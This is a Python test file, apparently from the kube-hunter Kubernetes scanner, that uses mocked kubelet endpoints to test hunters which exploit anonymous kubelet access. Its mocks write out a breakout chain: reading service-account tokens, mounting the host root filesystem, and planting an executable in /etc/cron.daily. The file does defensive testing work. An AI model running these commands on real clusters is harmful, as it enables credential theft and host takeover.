HOSTNAME=kube-hunter-privileged-deployment-86dc79f945-sjjps
|
||||
KUBERNETES_SERVICE_PORT=443
|
||||
KUBERNETES_SERVICE_PORT_HTTPS=443
|
||||
KUBERNETES_PORT=tcp://10.96.0.1:443
|
||||
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
|
||||
KUBERNETES_PORT_443_TCP_PROTO=tcp
|
||||
KUBERNETES_PORT_443_TCP_PORT=443
|
||||
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
|
||||
KUBERNETES_SERVICE_HOST=10.96.0.1
|
||||
HOME=/root"""
|
||||
exposed_privileged_containers = [
|
||||
{
|
||||
"container_name": "ubuntu",
|
||||
"environment_variables": env,
|
||||
"pod_id": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
|
||||
"pod_namespace": "kube-hunter-privileged",
|
||||
"service_account_token": service_account_token,
|
||||
}
|
||||
]
|
||||
cat_proc_cmdline = "BOOT_IMAGE=/boot/bzImage root=LABEL=Mock loglevel=3 console=ttyS0"
|
||||
number_of_rm_attempts = 1
|
||||
number_of_umount_attempts = 1
|
||||
number_of_rmdir_attempts = 1
|
||||
|
||||
|
||||
def create_test_event_type_one():
|
||||
anonymous_auth_enabled_event = AnonymousAuthEnabled()
|
||||
|
||||
anonymous_auth_enabled_event.host = "localhost"
|
||||
anonymous_auth_enabled_event.session = requests.Session()
|
||||
|
||||
return anonymous_auth_enabled_event
|
||||
|
||||
|
||||
def create_test_event_type_two():
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event = ExposedExistingPrivilegedContainersViaSecureKubeletPort(
|
||||
exposed_privileged_containers
|
||||
)
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event.host = "localhost"
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event.session = requests.Session()
|
||||
|
||||
return exposed_existing_privileged_containers_via_secure_kubelet_port_event
|
||||
|
||||
|
||||
def test_get_request_valid_url():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/mock"
|
||||
|
||||
session_mock.get(url, text="mock")
|
||||
|
||||
return_value = class_being_tested.get_request(url)
|
||||
|
||||
assert return_value == "mock"
|
||||
|
||||
|
||||
def test_get_request_invalid_url():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/[mock]"
|
||||
|
||||
session_mock.get(url, exc=requests.exceptions.InvalidURL)
|
||||
|
||||
return_value = class_being_tested.get_request(url)
|
||||
|
||||
assert return_value.startswith("Exception: ")
|
||||
|
||||
|
||||
def post_request(url, params, expected_return_value, exception=None):
|
||||
class_being_tested_one = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested_one.event.session) as session_mock:
|
||||
mock_params = {"text": "mock"} if not exception else {"exc": exception}
|
||||
session_mock.post(url, **mock_params)
|
||||
|
||||
return_value = class_being_tested_one.post_request(url, params)
|
||||
|
||||
assert return_value == expected_return_value
|
||||
|
||||
class_being_tested_two = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested_two.event.session) as session_mock:
|
||||
mock_params = {"text": "mock"} if not exception else {"exc": exception}
|
||||
session_mock.post(url, **mock_params)
|
||||
|
||||
return_value = class_being_tested_two.post_request(url, params)
|
||||
|
||||
assert return_value == expected_return_value
|
||||
|
||||
|
||||
def test_post_request_valid_url_with_parameters():
|
||||
url = "https://localhost:10250/mock?cmd=ls"
|
||||
params = {"cmd": "ls"}
|
||||
post_request(url, params, expected_return_value="mock")
|
||||
|
||||
|
||||
def test_post_request_valid_url_without_parameters():
|
||||
url = "https://localhost:10250/mock"
|
||||
params = {}
|
||||
post_request(url, params, expected_return_value="mock")
|
||||
|
||||
|
||||
def test_post_request_invalid_url_with_parameters():
|
||||
url = "https://localhost:10250/mock?cmd=ls"
|
||||
params = {"cmd": "ls"}
|
||||
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)
|
||||
|
||||
|
||||
def test_post_request_invalid_url_without_parameters():
|
||||
url = "https://localhost:10250/mock"
|
||||
params = {}
|
||||
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)
|
||||
|
||||
|
||||
def test_has_no_exception_result_with_exception():
|
||||
mock_result = "Exception: Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_exception_result_without_exception():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_exception(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_result_with_error():
|
||||
mock_result = "Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_result_without_error():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_without_exception_and_without_error():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_with_exception_and_without_error():
|
||||
mock_result = "Exception: Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_without_exception_and_with_error():
|
||||
mock_result = "Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_with_exception_and_with_error():
|
||||
mock_result = "Exception: Mock. Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def proveanonymousauth_success(anonymous_auth_enabled_event, security_context_definition_to_test):
|
||||
global counter
|
||||
counter = 0
|
||||
|
||||
with requests_mock.Mocker(session=anonymous_auth_enabled_event.session) as session_mock:
|
||||
url = "https://" + anonymous_auth_enabled_event.host + ":10250/"
|
||||
listing_pods_url = url + "pods"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
|
||||
session_mock.get(
|
||||
listing_pods_url,
|
||||
text=pod_list_with_privileged_container.replace(
|
||||
"{security_context_definition_to_test}", security_context_definition_to_test
|
||||
),
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("cat /var/run/secrets/kubernetes.io/serviceaccount/token", safe=""),
|
||||
text=service_account_token,
|
||||
)
|
||||
session_mock.post(run_url + "env", text=env)
|
||||
|
||||
class_being_tested = ProveAnonymousAuth(anonymous_auth_enabled_event)
|
||||
class_being_tested.execute()
|
||||
|
||||
assert "The following containers have been successfully breached." in class_being_tested.event.evidence
|
||||
|
||||
assert counter == 1
|
||||
|
||||
|
||||
def test_proveanonymousauth_success_with_privileged_container_via_privileged_setting():
|
||||
proveanonymousauth_success(create_test_event_type_one(), '"privileged": true')
|
||||
|
||||
|
||||
def test_proveanonymousauth_success_with_privileged_container_via_capabilities():
|
||||
proveanonymousauth_success(create_test_event_type_one(), '"capabilities": { "add": ["SYS_ADMIN"] }')
|
||||
|
||||
|
||||
def test_proveanonymousauth_connectivity_issues():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://" + class_being_tested.event.host + ":10250/"
|
||||
listing_pods_url = url + "pods"
|
||||
|
||||
session_mock.get(listing_pods_url, exc=requests.exceptions.ConnectionError)
|
||||
|
||||
class_being_tested.execute()
|
||||
|
||||
assert class_being_tested.event.evidence == ""
|
||||
|
||||
|
||||
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
|
||||
class ExposedPrivilegedContainersViaAnonymousAuthEnabledInSecureKubeletPortEventCounter(object):
|
||||
def __init__(self, event):
|
||||
global counter
|
||||
counter += 1
|
||||
|
||||
|
||||
def test_check_file_exists_existing_file():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")
|
||||
|
||||
return_value = class_being_tested.check_file_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "mock.txt"
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_check_file_exists_non_existent_file():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls nonexistentmock.txt", safe=""),
|
||||
text="ls: nonexistentmock.txt: No such file or directory",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.check_file_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"nonexistentmock.txt",
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
rm_command_removed_successfully_callback_counter = 0
|
||||
|
||||
|
||||
def rm_command_removed_successfully_callback(request, context):
|
||||
global rm_command_removed_successfully_callback_counter
|
||||
|
||||
if rm_command_removed_successfully_callback_counter == 0:
|
||||
rm_command_removed_successfully_callback_counter += 1
|
||||
return "mock.txt"
|
||||
else:
|
||||
return "ls: mock.txt: No such file or directory"
|
||||
|
||||
|
||||
def test_rm_command_removed_successfully():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls mock.txt", safe=""), text=rm_command_removed_successfully_callback
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="")
|
||||
|
||||
return_value = class_being_tested.rm_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"mock.txt",
|
||||
number_of_rm_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_rm_command_removed_failed():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")
|
||||
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.rm_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"mock.txt",
|
||||
number_of_rm_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
number_of_rm_attempts,
|
||||
None,
|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is True
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_failure_when_touch():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
|
||||
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""),
|
||||
text="Operation not permitted",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
None,
|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_failure_when_chmod():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
|
||||
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
None,
|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_check_directory_exists_existing_directory():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")
|
||||
|
||||
return_value = class_being_tested.check_directory_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_check_directory_exists_non_existent_directory():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="ls: Mock: No such file or directory")
|
||||
|
||||
return_value = class_being_tested.check_directory_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
rmdir_command_removed_successfully_callback_counter = 0
|
||||
|
||||
|
||||
def rmdir_command_removed_successfully_callback(request, context):
|
||||
global rmdir_command_removed_successfully_callback_counter
|
||||
|
||||
if rmdir_command_removed_successfully_callback_counter == 0:
|
||||
rmdir_command_removed_successfully_callback_counter += 1
|
||||
return "mock.txt"
|
||||
else:
|
||||
return "ls: Mock: No such file or directory"
|
||||
|
||||
|
||||
def test_rmdir_command_removed_successfully():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls Mock", safe=""), text=rmdir_command_removed_successfully_callback
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="")
|
||||
|
||||
return_value = class_being_tested.rmdir_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"Mock",
|
||||
number_of_rmdir_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_rmdir_command_removed_failed():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")
|
||||
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.rmdir_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"Mock",
|
||||
number_of_rmdir_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_get_root_values_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
root_value, root_value_type = class_being_tested.get_root_values(cat_proc_cmdline)
|
||||
|
||||
assert root_value == "Mock" and root_value_type == "LABEL="
|
||||
|
||||
|
||||
def test_get_root_values_failure():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
root_value, root_value_type = class_being_tested.get_root_values("")
|
||||
|
||||
assert root_value is None and root_value_type is None
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname"
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is True
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_cat_cmdline():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_findfs():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_mkdir():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="Permission denied"
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_mount():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_process_exposed_existing_privileged_container_failure_when_cat_hostname():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.process_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
None,
|
||||
directory_created,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_maliciousintentviasecurekubeletport_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
|
||||
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
|
||||
session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname"
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
|
||||
)
|
||||
|
||||
class_being_tested.execute(directory_created, file_name)
|
||||
|
||||
message = "The following exposed existing privileged containers have been successfully"
|
||||
message += " abused by starting/modifying a process in the host."
|
||||
|
||||
assert message in class_being_tested.event.evidence
|
||||
Reference in New Issue
Block a user